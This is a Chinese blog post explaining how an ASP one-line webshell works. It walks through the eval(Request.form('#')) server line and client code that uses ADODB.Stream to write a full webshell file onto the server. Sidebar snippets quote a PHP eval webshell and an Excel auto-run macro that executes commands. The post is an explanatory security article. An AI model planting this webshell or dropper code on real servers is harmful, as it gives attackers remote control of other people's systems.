一句话木马原理

最新推荐文章于 2024-03-15 18:00:00 发布
最新推荐文章于 2024-03-15 18:00:00 发布
阅读量2.4k 收藏
点赞数
分类专栏: 网络安全
首先<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>是JavaScript 脚本 的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行, 后面的eval是一句话木马的精华部分,使用eval方法的话它里面的字符串将会被执行,这样当脚本在服务器端运行的时候同时也执行了 Request.form('#')+''这句代码,Request.form('#')的作用是读取 客户端 文件中html标记属性中name值被命名 为#的部分,例如如下摘自一句话客户端的代码:
  <textarea name=# cols="80" rows="10">
  set iP=server.createObject("Adodb.Stream") 
  iP.Open 
  iP.Type=2 
  iP.CharSet="gb2312" 
  iP.writetext request("aoyun") 
  iP.SaveToFile server.mappath("aoyunwan.asp"),2 
  iP.Close 
  set iP=nothing 
  response.redirect "aoyunwan.asp" 
  </textarea>
  学过html的朋友应该注意到了在textarea标记中的name属性被赋值为#,也就是服务器端就是要读取其中的代码(使用Request.form('#')),然后执行(使用eval(Request.form('#')+'')),也就是执行了:
  set iP=server.createObject("Adodb.Stream") 
  iP.Open 
  iP.Type=2 
  iP.CharSet="gb2312" 
  iP.writetext request("aoyun") 
  iP.SaveToFile server.mappath("aoyunwan.asp"),2 
  iP.Close 
  set iP=nothing 
  response.redirect "aoyunwan.asp"
  学过asp的朋友应该看的懂,上面代码的意思是首先创建一个流对象ip,然后使用对象中的writetext方法将 request("aoyun")读取过来的内容(就是我们常见的一句话客户端的第二个textarea域中的内容,也就是我们的大马的代码)写入服务端 的 aoyunwan.asp
  文件中,写入结束后使用set iP=nothing 释放对方 然后使用response.redirect "aoyunwan.asp" 转向写入的文件,就是我们最后见的大马了!
請叫我菜鳥
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JS木马原理及防范方法
何足道也
09-21 3479
木马一直是黑客的拿手技量。善于用木马的黑客,可以在原来的入侵基础之上达到更大的目的。如今,虽然木马的种类有很多。但其中IFRAME挂马比较早,相应的预防措施也比较多,其中用CSS配合JS脚本进行预防是主流方式。可这种预防方式也存在安全隐患,JS脚本也可以被用来挂马,令人防不胜防。我们下面要介绍反击JS挂马的方法。 JS挂马溯源 当IFRAME逐渐被黑客滥用的时候,有经验的安全工程师也开始研究相
一句木马简介
qq_41272376的博客
02-15 6697
一句木马简介 一句木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句木马工作原理 <?php @eval($_POST['shell']);?> 这是php的一句后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php
渗透干货|史上最全一句木马
最新发布
Python栈
03-15 3453
/可执行命令一句密码-7ASPX一句的 过安全狗效果不怎么样不过我认为能支持aspx 百分之8/90支持asp原来代码是 把标签修改替换下来 为execute request(“cmd”) 这样就避开了符号!表中数据段限制,一句木马也写不下的情况网络中流传的最小的木马代码是 如过连这也写不下怎么办?
蚁剑从入门到魔改【二】· 编解码器原理及改造
buffedon的博客
12-25 2672
蚁剑编解码器原理蚁剑编解码器原理一、编码器编码器修改二、解码器 蚁剑编解码器原理 编码器:对发送流量进行编码,服务端进行解码 解码器:对服务端对返回的流量进行解码 一、编码器 输入三个参数 pwd:连接密码,类型string。 data:传输的数据数组,类型string数组,。 ext:一些扩展选项,在一些场景可能会用到。 输出一个参数 data: 编码器处理后的数组,这个你可以通过代理查看post提交了哪些数据,和这里的data是完全一样的 下面是编码器默认生成的代码 原理:将编码和解密后的代码 全都
一句木马原理浅析
whoim_i的博客
02-26 4430
        ~~~~~~~~        因为想要面对一个新的开始,一个人必须有梦想、有希望、有对未来的憧憬。如果没有这些,就不叫新的开始,而叫逃亡。 ​​​​      &nbsp...
木马学习笔记 1【一句木马篇】
Sp4rkW的博客
10-27 7077
注意注意:本博客仅供学习交流使用,不可用于任何违法行为中,学信息安全,保卫我国信息安全,爱我中国~ ummmm,之前队内交流提到了线下赛的木马,和表哥们的交流中也认识到很多不足,一边学习,一边进步吧,欢迎大佬留言指点~ 下面从一些基本种类的一句木马开始讲起【PHP环境】,主要讲述一句木马绕过及不死鸟木马原理 1.最最最最基础一句 eval($_POST["...
asp防止上传图片木马原理解析
10-23
有时候通过程序上传木马,一般都是伪装成图片,下面是asp下检测图片木马的代码,需要的朋友可以参考下。
一句使用方法
02-17
如何使用ASP一句木马呢?俗说的好:“害人之心不可有,防人之心不可无!”下面就由惟零广告为大家简单介绍一句木马的使用方法,让您了解其工作原理,确保您的程序万无一失!
PHP网站中的一句木马安全性和防范措施的研究.pdf
01-05
一、PHP一句木马的工作原理 PHP一句木马是一种使用eval函数来执行恶意代码的木马,通常的代码形式为`($_POST['pass']);?>`。其中,eval函数将字符串按照PHP代码来计算,@符号用于停止报错,而pass是木马连接器...
ASP下检测图片木马的函数代码
01-02
木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的 ASP代码插在图片编码之后,虽然图片仍然可以正常显示,但是文件内容和尺寸已被改变)...
计算机病毒与防护:文件上传漏洞原理.ppt
06-10
文件上传漏洞测试思路 文件上传漏洞---无任何上传限制 文件上传漏洞利用 文件上传漏洞---无任何上传限制 1)上传一句木马 eval.php 文件上传漏洞利用 文件上传漏洞---无任何上传限制 2)构造木马连接 3
eval一句木马原理详解
blackbean的专栏
08-19 1808
http://wenku.baidu.com/view/38795d1910a6f524ccbf8591.html
中国蚁剑(AntSword)安装、使用教程
热门推荐
丶没胡子的猫
08-24 9万+
项目地址 加载器: https://github.com/eastmountyxz/AntSword-Experiment/ 项目核心源码: https://github.com/yuyuko233/AntSword 如果从github上下载很卡,可以去复制链接到githubd上下载 https://githubd.com 安装教程 我使用的渗透机为windows10,下载好会包含两个文件: 使用教程 插件安装 ...
一句木马该怎么实现?现在就带你了解
kali_Ma的博客
07-30 5267
前言 一直以来,Java一句木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句木马:利用Java中JS引擎实现的一句木马。 基本原理 Java没有eval函数,Js有eval函数,可以把字符串当代码解析。 Java从1.6开始自带ScriptEng
菜刀和一句木马
weixin_44720762的博客
05-02 3781
中国菜刀,一个非常好用而又强大的webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 在博主本人看来,对于一名网安小白来说,这段解释对理解webshell没有丝毫帮助。webshell:web:网站 shell:命令语言。执行用户输入的命令或者说执行预先设定好的一连串的命令 也就是一种具有命令效果的网页代码,...
一句木马剖析
milantgh的专栏
07-31 2896
今天我通过菜刀来分析一下一句原理吧,都是些基础!   wireshark抓包分析:   因为是在本地搭建的分析环境,所以要抓取回环数据包,故: 网络接口信息: 监听回环数据包: 最后问题解决了: wireshark抓包环节:   首先上传一个小马:xm.php到localhost: 开启菜刀,post小马: 在wiresha
文件上传漏洞(一句木马)-学习笔记
小龙在线
08-21 1万+
在很多的渗透过程中,渗透人员会上传一句木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句木马到底是什么呢? 先来看看最简单的一句木马
java 菜刀_jsp一句木马菜刀
weixin_30341121的博客
02-20 6231
1.如何使用JSP一句木马和菜刀木马相信用过一句木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨...
向中国菜刀致敬!中国蚁剑
血色苍穹
11-02 3795
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员已近进行常规操作的网站管理员。 任何人不得将其用于非法用途以及盈利等目的,也禁止未经允许私自修改打包进行发布,否则后果自行承担并将追究其相关责任! Windows安装蚁剑 中国蚁剑从V2.0.0-beta版本开始,引入了加载器。用户/开发者只需要下载对应平台的加载器,无需安装额外的环境,即可对源代码进行编译/执行/调试等...
excel一句木马
01-26
Excel一句木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被窃取。 以下是一个示例,展示了如何在Excel中创建一句木马: ```vba Sub Auto_Open() Dim shell As Object Set shell = CreateObject("WScript.Shell") shell.Run "cmd.exe /c your_malicious_command", 0 End Sub ``` 在上述示例中,恶意宏代码使用`WScript.Shell`对象创建一个命令行窗口,并执行`your_malicious_command`命令。这个命令可以是任何你想要在受害者计算机上执行的恶意操作。 请注意,使用恶意宏代码进行攻击是非法的,并且可能导致法律责任。为了保护自己的计算机安全,建议不要打开来自不信任来源的Excel文件,并确保你的计算机有最新的安全补丁和防病毒软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值